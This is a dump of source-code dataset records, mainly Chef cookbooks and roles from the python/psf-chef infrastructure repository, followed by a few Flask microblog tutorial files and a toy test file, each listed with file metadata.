<tr>\n <td>username</td>\n <td><b>Name attribute:</b> The name of the user.</td>\n <td><code>nil</code></td>\n </tr>\n <tr>\n <td>comment</td>\n <td>Gecos/Comment field.</td>\n <td><code>nil</code></td>\n </tr>\n <tr>\n <td>uid</td>\n <td>The numeric user id.</td>\n <td><code>nil</code></td>\n </tr>\n <tr>\n <td>gid</td>\n <td>The primary group id.</td>\n <td><code>nil</code></td>\n </tr>\n <tr>\n <td>home</td>\n <td>Home directory location.</td>\n <td><code>\"#{node['user']['home_root']}/#{username}</code></td>\n </tr>\n <tr>\n <td>shell</td>\n <td>The login shell.</td>\n <td><code>node['user']['default_shell']</code></td>\n </tr>\n <tr>\n <td>password</td>\n <td>Shadow hash of password.</td>\n <td><code>nil</code></td>\n </tr>\n <tr>\n <td>system_user</td>\n <td>Whether or not to create a system user.</td>\n <td><code>false</code></td>\n </tr>\n <tr>\n <td>manage_home</td>\n <td>Whether or not to manage the home directory.</td>\n <td><code>true</code></td>\n </tr>\n <tr>\n <td>create_group</td>\n <td>\n Whether or not to to create a group with the same name as the user.\n </td>\n <td><code>node['user']['create_group']</code></td>\n </tr>\n <tr>\n <td>ssh_keys</td>\n <td>\n A <b>String</b> or <b>Array</b> of SSH public keys to populate the\n user's <code>.ssh/authorized_keys</code> file.\n </td>\n <td><code>[]</code></td>\n </tr>\n <tr>\n <td>ssh_keygen</td>\n <td>Whether or not to generate an SSH keypair for the user.</td>\n <td><code>node['user']['ssh_keygen']</code></td>\n </tr>\n </tbody>\n</table>\n\n#### <a name=\"lwrps-ua-examples\"></a> Examples\n\n##### Creating a User Account\n\n user_account 'hsolo' do\n comment 'Han Solo'\n ssh_keys ['3dc348d9af8027df7b9c...', '2154d3734d609eb5c452...']\n home '/opt/hoth/hsolo'\n end\n\n##### Locking a User Account\n\n user_account 'lando' do\n action :lock\n end\n\n##### Removing a User account\n\n user_account 'obiwan' do\n action :remove\n end\n\n## <a name=\"development\"></a> Development\n\n* Source hosted at [GitHub][repo]\n* Report issues/Questions/Feature requests on [GitHub Issues][issues]\n\nPull requests are very welcome! Make sure your patches are well tested.\nIdeally create a topic branch for every separate change you make.\n\n## <a name=\"license\"></a> License and Author\n\nAuthor:: Fletcher Nichol (<[email protected]>)\n\nCopyright 2011, Fletcher Nichol\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\n[chef_repo]: https://github.com/opscode/chef-repo\n[cheffile]: https://github.com/applicationsonline/librarian/blob/master/lib/librarian/chef/templates/Cheffile\n[kgc]: https://github.com/websterclay/knife-github-cookbooks#readme\n[librarian]: https://github.com/applicationsonline/librarian#readme\n[ruby-shadow_gem]: https://rubygems.org/gems/ruby-shadow\n\n[repo]: https://github.com/fnichol/chef-user\n[issues]: https://github.com/fnichol/chef-user/issues\n"
},
{
"alpha_fraction": 0.6476190686225891,
"alphanum_fraction": 0.6476190686225891,
"avg_line_length": 10.666666984558105,
"blob_id": "37fa6c5c9203bc4b44e56561337d95d1b35efac3",
"content_id": "bfc73b821881638dc7f7bcc6a8e2d529aaa88704",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 105,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 9,
"path": "/cookbooks/psf-evote/README.md",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "# psf-evote cookbook\n\n# Usage\n\nAdd `recipe[psf-evote]` to run list.\n\n# Author\n\nAuthor:: Noah Kantrowitz <[email protected]>\n"
},
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 18,
"blob_id": "93d34aea80185dca124ca7e281df5b3c805f3e91",
"content_id": "a0fff71a4ce34fb4a959a7a0b9eb6813de463a66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 114,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 6,
"path": "/roles/pypy-home.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name \"pypy-home\"\ndescription \"Frontend for pypy.org\"\n# Owner: Alex Gaynor <[email protected]>\nrun_list [\n \"recipe[pypy-home]\"\n]\n"
},
{
"alpha_fraction": 0.6401869058609009,
"alphanum_fraction": 0.6542056202888489,
"avg_line_length": 28.18181800842285,
"blob_id": "40a85df5f3a964367a5fb2e35e49da511ba423ee",
"content_id": "cf3d6b8607c6f44fdff3d71ba25ac09f8c85d54f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 642,
"license_type": "no_license",
"max_line_length": 190,
"num_lines": 22,
"path": "/cookbooks/psf-rsnapshot/recipes/postgres.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "package 'postgresql-client'\n\npostgres = data_bag_item('secrets', 'postgres')\npostgres.delete('id')\n\nfile '/etc/rsnapshot_postgres_passwords' do\n owner 'root'\n group 'root'\n mode '0600'\n content postgres.map{|name, data| \"*:*:*:#{data['user']}:#{data['password']}\\n\"}.join('')\nend\n\npostgres.each do |name, data|\n version = if data['hostname'] == 'pg2.osuosl.org'\n '9.2'\n else\n '9.1'\n end\n rsnapshot_script \"postgres-#{name}\" do\n command \"/usr/bin/env PGPASSFILE=/etc/rsnapshot_postgres_passwords /usr/lib/postgresql/#{version}/bin/pg_dump -h #{data['hostname']} -U #{data['user']} -f backup.sql #{data['database']}\"\n end\nend\n"
},
{
"alpha_fraction": 0.7214285731315613,
"alphanum_fraction": 0.7267857193946838,
"avg_line_length": 30.11111068725586,
"blob_id": "09ae7533d2940beb2015ecbff41d3b0f1bef91be",
"content_id": "eac147218392950afa94832ea5e297428248ca14",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 560,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 18,
"path": "/cookbooks/haproxy/providers/section.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "action :install do\n template \"#{new_resource.haproxy_resource.config_directory}/conf.d/#{new_resource.name}.cfg\" do\n source new_resource.source\n cookbook new_resource.cookbook || new_resource.cookbook_name.to_s\n owner 'root'\n group 'root'\n mode '644'\n variables new_resource.variables\n notifies :reload, new_resource.haproxy_resource\n end\nend\n\naction :remove do\n file \"#{new_resource.haproxy_resource.config_directory}/conf.d/#{new_resource.name}.cfg\" do\n action :delete\n notifies :reload, new_resource.haproxy_resource\n end\nend\n"
},
{
"alpha_fraction": 0.5188469886779785,
"alphanum_fraction": 0.5321508049964905,
"avg_line_length": 27.1875,
"blob_id": "d080a8d7ca7e89d1da6a00603295d2f879f89d49",
"content_id": "423d22b551e83063969b66c7f0103e695d11529b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 451,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 16,
"path": "/cookbooks/psf-pypi/metadata.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name \"psf-pypi\"\nmaintainer \"Noah Kantrowitz\"\nmaintainer_email \"[email protected]\"\nlicense \"Apache 2.0\"\ndescription \"Installs and configures PyPI\"\nversion \"0.0.24\"\n\ndepends \"pgbouncer\"\ndepends \"rsyslog\"\ndepends \"postgresql\"\ndepends \"mercurial\"\ndepends \"python\"\ndepends \"nginx\"\ndepends \"supervisor\"\ndepends \"gunicorn\"\ndepends \"sysctl\"\n"
},
{
"alpha_fraction": 0.6864407062530518,
"alphanum_fraction": 0.694915235042572,
"avg_line_length": 22.600000381469727,
"blob_id": "60865bce6d154bf1d846954752b1b855b3745f83",
"content_id": "13d68add725b6d885fd626390449f2186dfda777",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 236,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 10,
"path": "/Gemfile",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "# An sample Gemfile\nsource \"https://rubygems.org\"\n\ngem \"chef\"\ngem \"rake\"\ngem \"berkshelf\", \"~>1.4\"\ngem \"foodcritic\"\ngem \"chef-rewind\"\ngem \"chef-zero\"\ngem \"knife-reporter\", :github => \"benjaminws/knife-reporter\", :branch => \"development\"\n"
},
{
"alpha_fraction": 0.6569940447807312,
"alphanum_fraction": 0.7120535969734192,
"avg_line_length": 16.230770111083984,
"blob_id": "3012790504f8fcfb2e007ff281ac4a2e7e329e4a",
"content_id": "a4ddaefbf2347d073eb572db50c6abdec045cbb6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1344,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 78,
"path": "/cookbooks/psf-monitoring/recipes/server.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "chef_gem 'chef-rewind'\nrequire 'chef/rewind'\n\ninclude_recipe 'runit'\ninclude_recipe 'riemann::server'\ninclude_recipe 'graphite'\ninclude_recipe 'firewall'\ninclude_recipe 'psf-monitoring::client'\n\n%w{ruby1.9.3 rubygems}.each do |pkg|\n package pkg do\n action :upgrade\n end\nend\n\ngem_package 'riemann-tools' do\n action :install\n gem_binary '/usr/bin/gem1.9.3'\nend\n\ntemplate '/etc/riemann/riemann.config' do\n source 'riemann.config.erb'\n owner 'root'\n group 'root'\n mode '0644'\n notifies :restart, 'service[riemann]'\nend\n\nfirewall 'ufw' do\n action :enable\nend\n\nfirewall_rule 'ssh' do\n port 22\n protocol :tcp\n action :allow\nend\n\nfirewall_rule 'http' do\n port 80\n protocol :tcp\n action :allow\nend\n\nfirewall_rule 'riemann_our_net' do\n port 5555\n source '140.211.10.64/26'\n direction :in\n action :allow\nend\n\nfirewall_rule 'graphite_our_net' do\n port 2003\n source '140.211.10.64/26'\n direction :in\n action :allow\nend\n\nfirewall_rule 'riemann_speed' do\n port 5555\n source '140.211.15.123/32'\n direction :in\n action :allow\nend\n\nfirewall_rule 'graphite_speed' do\n port 2003\n source '140.211.15.123/32'\n direction :in\n action :allow\nend\n\nstorage_template = \"#{node['graphite']['base_dir']}/conf/storage-schemas.conf\"\n\nrewind :template => storage_template do\n source 'storage-schemas.conf.erb'\n cookbook_name 'psf-monitoring'\nend\n"
},
{
"alpha_fraction": 0.8214285969734192,
"alphanum_fraction": 0.8214285969734192,
"avg_line_length": 27,
"blob_id": "e620b0427eb0cc6be3b18871f1620051fd48137a",
"content_id": "2252d1158ff4aa6fa382dbbfbef83e3836b14598",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 56,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 2,
"path": "/roles/buildmaster.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name \"buildmaster\"\ndescription \"Python buildbot master\"\n"
},
{
"alpha_fraction": 0.6506051421165466,
"alphanum_fraction": 0.6734414100646973,
"avg_line_length": 29.40972137451172,
"blob_id": "c51dd99b60c79f7d2a892e1fd615a64e75beefd6",
"content_id": "16b0abfc773c60d2a8ce82eff16e46dd6a5a3cac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 4379,
"license_type": "no_license",
"max_line_length": 207,
"num_lines": 144,
"path": "/cookbooks/psf-pycon/recipes/app.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "secrets = data_bag_item(\"secrets\", \"pycon\")\nis_production = tagged?('production')\nif is_production\n db = data_bag_item(\"secrets\", \"postgres\")[\"pycon2016\"]\n app_name = \"us.pycon.org\"\n sentry_dsn = secrets[\"sentry_dsn\"][\"production\"]\n google_oauth2 = secrets[\"google_oauth2\"][\"production\"]\nelse\n db = data_bag_item(\"secrets\", \"postgres\")[\"pycon2016-staging\"]\n app_name = \"staging-pycon.python.org\"\n sentry_dsn = secrets[\"sentry_dsn\"][\"staging\"]\n google_oauth2 = secrets[\"google_oauth2\"][\"staging\"]\nend\n\ninclude_recipe \"psf-pycon::apt_pgdg_postgresql\"\ninclude_recipe \"nodejs::install_from_binary\"\ninclude_recipe \"git\"\ninclude_recipe \"firewall\"\n\n\n# Common env for Django processes\napp_env = {\n \"SECRET_KEY\" => secrets[\"secret_key\"],\n \"GRAYLOG_HOST\" => secrets[\"graylog_host\"],\n \"IS_PRODUCTION\" => \"#{is_production}\",\n \"DB_NAME\" => db[\"database\"],\n \"DB_HOST\" => db[\"hostname\"],\n \"DB_PORT\" => \"\",\n \"DB_USER\" => db[\"user\"],\n \"DB_PASSWORD\" => db[\"password\"],\n \"EMAIL_HOST\" => \"mail.python.org\",\n \"MEDIA_ROOT\" => \"/srv/staging-pycon.python.org/shared/media/\",\n \"SENTRY_DSN\" => sentry_dsn,\n \"GOOGLE_OAUTH2_CLIENT_ID\" => google_oauth2['client_id'],\n \"GOOGLE_OAUTH2_CLIENT_SECRET\" => google_oauth2['client_secret'],\n}\nENV.update(app_env)\n\nexecute \"install_lessc\" do\n command \"npm install -g [email protected]\"\nend\n\ngit \"/srv/pycon-archive\" do\n repository \"https://github.com/python/pycon-archive.git\"\n revision \"master\"\nend\n\napplication app_name do\n path \"/srv/staging-pycon.python.org\"\n repository \"git://github.com/caktus/pycon.git\"\n revision is_production ? \"production\" : \"staging\"\n packages [\"postgresql-client-#{node['postgresql']['version']}\", \"libpq-dev\", \"git-core\", \"libjpeg8-dev\"]\n migration_command \"/srv/staging-pycon.python.org/shared/env/bin/python manage.py migrate --noinput\"\n migrate true\n\n before_deploy do\n directory \"/srv/staging-pycon.python.org/shared/media\" do\n owner \"root\"\n group \"root\"\n action :create\n end\n end\n\n before_symlink do\n execute \"/srv/staging-pycon.python.org/shared/env/bin/python manage.py compress --force\" do\n user \"root\"\n cwd release_path\n end\n end\n\n django do\n requirements \"requirements/project.txt\"\n settings_template \"local_settings.py.erb\"\n local_settings_file \"local_settings.py\"\n collectstatic \"collectstatic --noinput\"\n settings :secret_key => secrets[\"secret_key\"], :graylog_host => secrets[\"graylog_host\"], :is_production => is_production\n database do\n engine \"postgresql_psycopg2\"\n database db[\"database\"]\n hostname db[\"hostname\"]\n username db[\"user\"]\n password db[\"password\"]\n end\n end\n\n gunicorn do\n app_module \"symposion.wsgi\"\n environment app_env\n virtualenv \"/srv/staging-pycon.python.org/shared/env\"\n end\n\n nginx_load_balancer do\n template 'nginx.conf.erb' # Remove this once /2014/ is the default\n hosts ['localhost']\n server_name [node['fqdn'], 'staging-pycon.python.org', 'us.pycon.org']\n static_files({\n \"/2016/site_media/static\" => \"site_media/static\",\n \"/2016/site_media/media\" => \"/srv/staging-pycon.python.org/shared/media\",\n \"/2015\" => \"/srv/pycon-archive/2015\",\n \"/2014\" => \"/srv/pycon-archive/2014\",\n \"/2013\" => \"/srv/pycon-archive/2013\",\n \"/2012\" => \"/srv/pycon-archive/2012\",\n \"/2011\" => \"/srv/pycon-archive/2011\",\n })\n application_port 8080\n end\n\nend\n\ntemplate \"/srv/staging-pycon.python.org/shared/.env\" do\n path \"/srv/staging-pycon.python.org/shared/.env\"\n source \"environment.erb\"\n mode \"0440\"\n variables :app_env => app_env\nend\n\ncron_d \"staging-pycon-account-expunge\" do\n hour \"0\"\n minute \"0\"\n command \"bash -c 'source /srv/staging-pycon.python.org/shared/.env && cd /srv/staging-pycon.python.org/current && /srv/staging-pycon.python.org/shared/env/bin/python manage.py expunge_deleted'\"\nend\n\ncron_d \"staging-pycon-update-tutorial-registrants\" do\n hour \"0\"\n minute \"20\"\n command \"bash -c 'source /srv/staging-pycon.python.org/shared/.env && cd /srv/staging-pycon.python.org/current && /srv/staging-pycon.python.org/shared/env/bin/python manage.py update_tutorial_registrants'\"\nend\n\nfirewall 'ufw' do\n action :enable\nend\n\nfirewall_rule 'ssh' do\n port 22\n protocol :tcp\n action :allow\nend\n\nfirewall_rule 'http_our_net' do\n port 80\n source '140.211.10.64/26'\n direction :in\n action :allow\nend\n"
},
{
"alpha_fraction": 0.6484017968177795,
"alphanum_fraction": 0.6898489594459534,
"avg_line_length": 48.08620834350586,
"blob_id": "6113a7463e8fc2f9a87b662ea5fb2e9cc1ff8484",
"content_id": "643402a3ac59d77fd4d89a7c6e86fcbc35c861cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 2847,
"license_type": "no_license",
"max_line_length": 163,
"num_lines": 58,
"path": "/Berksfile",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "site :opscode\n\ncookbook \"apt\", '= 1.9.0'\ncookbook \"chef-client\", '= 1.1.2'\ncookbook \"sudo\", '= 2.2.2'\ncookbook \"jn_sysctl\", '= 1.1.0'\ncookbook \"heartbeat\", :git => \"https://github.com/coderanger/heartbeat.git\"\ncookbook \"ntp\", '= 1.1.8'\ncookbook \"motd-tail\", '= 1.1.0'\ncookbook \"build-essential\", '= 1.4.0'\ncookbook \"zsh\", '= 1.0.0'\ncookbook \"application\", '= 3.0.0'\n#cookbook \"application_python\", \"= 2.0.0\"\ncookbook \"application_python\", :git => 'https://github.com/dstufft/application_python.git', :ref => \"use-exists-action\"\ncookbook \"python\", '= 1.2.0'\n#cookbook \"application_nginx\", '= 2.0.0'\ncookbook 'application_nginx', :git => 'https://github.com/dstufft/application_nginx.git', :ref => \"chef-solo\" # Pending http://tickets.opscode.com/browse/COOK-3254\ncookbook \"nginx\", '= 1.1.2'\ncookbook \"apache2\", '= 1.4.0'\ncookbook \"postfix\", '= 2.1.2'\ncookbook \"mercurial\", :git => \"https://github.com/coderanger/mercurial.git\", :ref => \"lwrp-updates\"\ncookbook \"openssh\", '= 1.1.4'\ncookbook \"java\", '= 1.10.0'\ncookbook \"runit\", '= 1.1.0'\ncookbook \"riemann\", :git => \"https://github.com/benjaminws/riemann-chef.git\", :ref => \"a6882ef7bad0d842f42f2fa97acbefd7d0d29c38\"\ncookbook \"memcached\", '= 1.3.0'\ncookbook \"graphite\", :git => \"git://github.com/hw-cookbooks/graphite.git\", :ref => \"39b0e35d437a7a8d4a8ce09e2617fdda4c917801\"\ncookbook \"collectd\", :git => \"https://github.com/miah/chef-collectd.git\", :ref => \"tags/1.0.8\"\ncookbook \"firewall\", '= 0.10.2'\ncookbook \"rsyslog\"\ncookbook \"postgresql\"\ncookbook \"nodejs\", '= 1.1.2'\ncookbook \"reprepro\"\ncookbook \"poise\", :git => \"https://github.com/poise/poise-cookbook.git\"\ncookbook \"jenkins\", :git => \"https://github.com/balanced-cookbooks/jenkins.git\"\ncookbook \"elasticsearch\"\ncookbook \"sysctl\"\n\n# Our cookbooks\ncookbook \"haproxy\", :path => \"./cookbooks/haproxy\"\ncookbook \"pgbouncer\", :path => \"./cookbooks/pgbouncer\"\ncookbook \"psf-advocacy\", :path => \"./cookbooks/psf-advocacy\"\ncookbook \"psf-evote\", :path => \"./cookbooks/psf-evote\"\ncookbook \"psf-loadbalancer\", :path => \"./cookbooks/psf-loadbalancer\"\ncookbook \"psf-misc\", :path => \"./cookbooks/psf-misc\"\ncookbook \"psf-moin\", :path => \"./cookbooks/psf-moin\"\ncookbook \"psf-monitoring\", :path => \"./cookbooks/psf-monitoring\"\ncookbook \"psf-postgresql\", :path => \"./cookbooks/psf-postgresql\"\ncookbook \"psf-pypy\", :path => \"./cookbooks/psf-pypi\"\ncookbook \"psf-rsnapshot\", :path => \"./cookbooks/psf-rsnapshot\"\ncookbook \"psf-pycon\", :path => \"./cookbooks/psf-pycon\"\ncookbook \"pydotorg-redesign\", :path => \"./cookbooks/pydotorg-redesign\"\ncookbook \"pypy-codespeed\", :path => \"./cookbooks/pypy-codespeed\"\ncookbook \"pypy-home\", :path => \"./cookbooks/pypy-home\"\ncookbook \"rsnapshot\", :path => \"./cookbooks/rsnapshot\"\ncookbook \"stud\", :path => \"./cookbooks/stud\"\ncookbook \"user\", :path => \"./cookbooks/user\"\ncookbook \"psf-debbuild\", :path => \"./cookbooks/psf-debbuild\"\n"
},
{
"alpha_fraction": 0.704081654548645,
"alphanum_fraction": 0.7244898080825806,
"avg_line_length": 18.399999618530273,
"blob_id": "99b06bcd9b9e96773e226c3b6c2526c69c3184e3",
"content_id": "9a159f04d7cc1c618ceb9b20c13bca7a3c938dda",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 98,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 5,
"path": "/cookbooks/psf-pypi/recipes/default.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "\nresources('rsnapshot_backup[/]').action(:nothing)\n\nsysctl_param 'kernel.panic' do\n value 10\nend\n"
},
{
"alpha_fraction": 0.684155285358429,
"alphanum_fraction": 0.6977964043617249,
"avg_line_length": 28.78125,
"blob_id": "a5ae218ca0cd4c55da59f9272e64dc68d589b20a",
"content_id": "3659fe36dfe75ddd53535a6a7a4a92740a51c180",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 953,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 32,
"path": "/cookbooks/pypy-home/recipes/default.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "include_recipe 'mercurial'\n\n# Temporary workaround because the hg provider computes the target rev\n# locally before pulling, so of course it is always the old. The right fix is\n# to either always pull (lame) or use the hg API to enumerate hashes on the\n# remote server. See http://stackoverflow.com/a/11900786/78722 for the latter.\nif ::File.exists?('/srv/pypy.org/shared/cached-copy/.hg')\n execute 'hg pull' do\n user 'root'\n group 'root'\n cwd '/srv/pypy.org/shared/cached-copy'\n end\n\n execute 'hg checkout -C extradoc' do\n user 'root'\n group 'root'\n cwd '/srv/pypy.org/shared/cached-copy'\n end\nend\n\napplication \"pypy.org\" do\n path \"/srv/pypy.org\"\n repository \"https://bitbucket.org/pypy/pypy.org\"\n revision 'tip'\n scm_provider Chef::Provider::Mercurial\n\n nginx_load_balancer do\n template \"nginx.conf.erb\"\n server_name [node['fqdn'], 'pypy.org', 'www.pypy.org']\n static_files \"/\" => \"/srv/pypy.org/current\"\n end\nend\n"
},
{
"alpha_fraction": 0.4375,
"alphanum_fraction": 0.6875,
"avg_line_length": 15,
"blob_id": "77fae44a6fb42ca3cc99847c9fc27901c57ea89a",
"content_id": "6449e325b8d4df2d05511279c6bf950b9c01126d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 16,
"license_type": "no_license",
"max_line_length": 15,
"num_lines": 1,
"path": "/cookbooks/psf-monitoring/files/default/riemann-dash/config.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "set :port, 6000\n"
}
] | 126 |
kylie-hetzel/TEST | https://github.com/kylie-hetzel/TEST | 7a43e8c94ecdd80277c9894a045fc838d20db134 | 4b55c4a40e11a0233c71400dcbcd5a7ff84e6ebf | 79875b49b07d129ed44215a76621e6950d4c7a98 | refs/heads/master | 2020-03-24T01:25:39.281207 | 2018-07-25T17:35:10 | 2018-07-25T17:35:10 | 141,630,067 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5833333134651184,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 8.25,
"blob_id": "1b6a2bd57aabc09eaeec2d343d538420d6996d5e",
"content_id": "b0a9f7852616ff1bb5b81b35a6ea3e7965b5c874",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 36,
"license_type": "no_license",
"max_line_length": 19,
"num_lines": 4,
"path": "/TEST.py",
"repo_name": "kylie-hetzel/TEST",
"src_encoding": "UTF-8",
"text": "for x in 100\n{\nprint \"Hello World\"\n}"
}
] | 1 |
laggardkernel/tutorial-py-microblog | https://github.com/laggardkernel/tutorial-py-microblog | 84e4fcece197b37bd2e09dd59e6706dbe9e55ae1 | 39b8838e6894139396f8301e798e2f94e01ee160 | 8209797edc6e9af7c4006af1bead0d946472066b | refs/heads/master | 2020-04-18T03:52:28.193872 | 2019-05-01T08:45:00 | 2019-05-01T08:45:00 | 167,216,844 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6985645890235901,
"alphanum_fraction": 0.7081339955329895,
"avg_line_length": 25.125,
"blob_id": "12cead1ffda6cc3438d8904b9a78472f36873fae",
"content_id": "8a66ce0abf32f0f2b87a4a54acb402f2d6264aba",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 209,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 8,
"path": "/app/api/__init__.py",
"repo_name": "laggardkernel/tutorial-py-microblog",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom flask import Blueprint\n\nbp = Blueprint('api', __name__)\n\n# load submodules at the end to avoid circular dependency\nfrom app.api import users, errors, tokens\n"
},
{
"alpha_fraction": 0.6309880018234253,
"alphanum_fraction": 0.6339820623397827,
"avg_line_length": 32.400001525878906,
"blob_id": "cc494a759ad57b140a2742e03192b1c0c7a108a6",
"content_id": "cf217282c515ce04ba0c0aa9aa8a888334d0dac1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1336,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 40,
"path": "/config.py",
"repo_name": "laggardkernel/tutorial-py-microblog",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport os\nfrom dotenv import load_dotenv\n\nbasedir = os.path.dirname(os.path.abspath(__file__))\n# load_dotenv(os.path.join(basedir, '.env')) # built in Flask now\n\n\nclass Config(object):\n \"\"\"\n Store different configs in separate classes\n \"\"\"\n SECRET_KEY = os.environ.get('SECRET_KEY') or 'you-will-never-guess'\n\n SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL') or \\\n 'sqlite:///' + os.path.join(basedir, 'app.db')\n SQLALCHEMY_TRACK_MODIFICATIONS = False # disable signal of db changes\n\n MAIL_SERVER = os.environ.get('MAIL_SERVER')\n MAIL_PORT = os.environ.get('MAIL_PORT')\n MAIL_PORT = os.environ.get('MAIL_PORT')\n MAIL_USE_TLS = os.environ.get('MAIL_USE_TLS') is not None\n MAIL_USERNAME = os.environ.get('MAIL_USERNAME')\n MAIL_PASSWORD = os.environ.get('MAIL_PASSWORD')\n ADMINS = ['[email protected]']\n if os.environ.get('ADMIN'):\n ADMINS = [os.environ.get('ADMIN')] + ADMINS\n\n POSTS_PER_PAGE = 25\n LANGUAGES = ['en', 'zh_CN']\n MS_TRANSLATOR_KEY = os.environ.get('MS_TRANSLATOR_KEY')\n\n # Full-text search\n ELASTICSEARCH_URL = os.environ.get('ELASTICSEARCH_URL')\n\n # log to stdout for heroku\n LOG_TO_STDOUT = os.environ.get('LOG_TO_STDOUT')\n\n REDIS_URL = os.environ.get('REDIS_URL') or 'redis://'\n"
},
{
"alpha_fraction": 0.715990424156189,
"alphanum_fraction": 0.7613365054130554,
"avg_line_length": 22.27777862548828,
"blob_id": "e451ff5839f42992fea6f05bc84a92ee3a49a1e8",
"content_id": "8fb99b97f8a837cd8ba89b5c2ce02bb73f537d78",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 419,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 18,
"path": "/.env.example",
"repo_name": "laggardkernel/tutorial-py-microblog",
"src_encoding": "UTF-8",
"text": "# export FLASK_DEBUG=1\nSECRET_KEY=you-may-guess-this\n\n# Use test server, remember to disable TLS\n# python -m smtpd -n -c DebuggingServer localhost:8025\n# MAIL_SERVER=localhost\n# MAIL_PORT=8025\n\nMAIL_USE_TLS=1\[email protected]\nMAIL_PASSWORD=\"password\"\[email protected]\n\n# export MS_TRANSLATOR_KEY=<paste-your-key-here>\nELASTICSEARCH_URL='http://localhost:9200'\n\n# heroku\n# DATABASE_URL=postgresql-asymmetrical-70401\n"
},
{
"alpha_fraction": 0.719298243522644,
"alphanum_fraction": 0.7280701994895935,
"avg_line_length": 27.5,
"blob_id": "333315119c5b4a1611dad3036ba501624c579059",
"content_id": "21f7de6a2e9d6ca3c58b702e8c6992e8ae7a17f6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 228,
"license_type": "permissive",
"max_line_length": 63,
"num_lines": 8,
"path": "/app/errors/__init__.py",
"repo_name": "laggardkernel/tutorial-py-microblog",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom flask import Blueprint\n\nbp = Blueprint('errors', __name__, template_folder='templates')\n\n# import at the bottom to avoid circular denpendencies\nfrom app.errors import handlers\n"
},
{
"alpha_fraction": 0.6309523582458496,
"alphanum_fraction": 0.6726190447807312,
"avg_line_length": 23,
"blob_id": "d8267b65caf0636def0dc970a95a7a5465456ee7",
"content_id": "1c9df7f39c9a62a0f646802c1696e40c254ad1cc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 672,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 28,
"path": "/migrations/versions/0c2176704a5e_avatar_hash_for_user.py",
"repo_name": "laggardkernel/tutorial-py-microblog",
"src_encoding": "UTF-8",
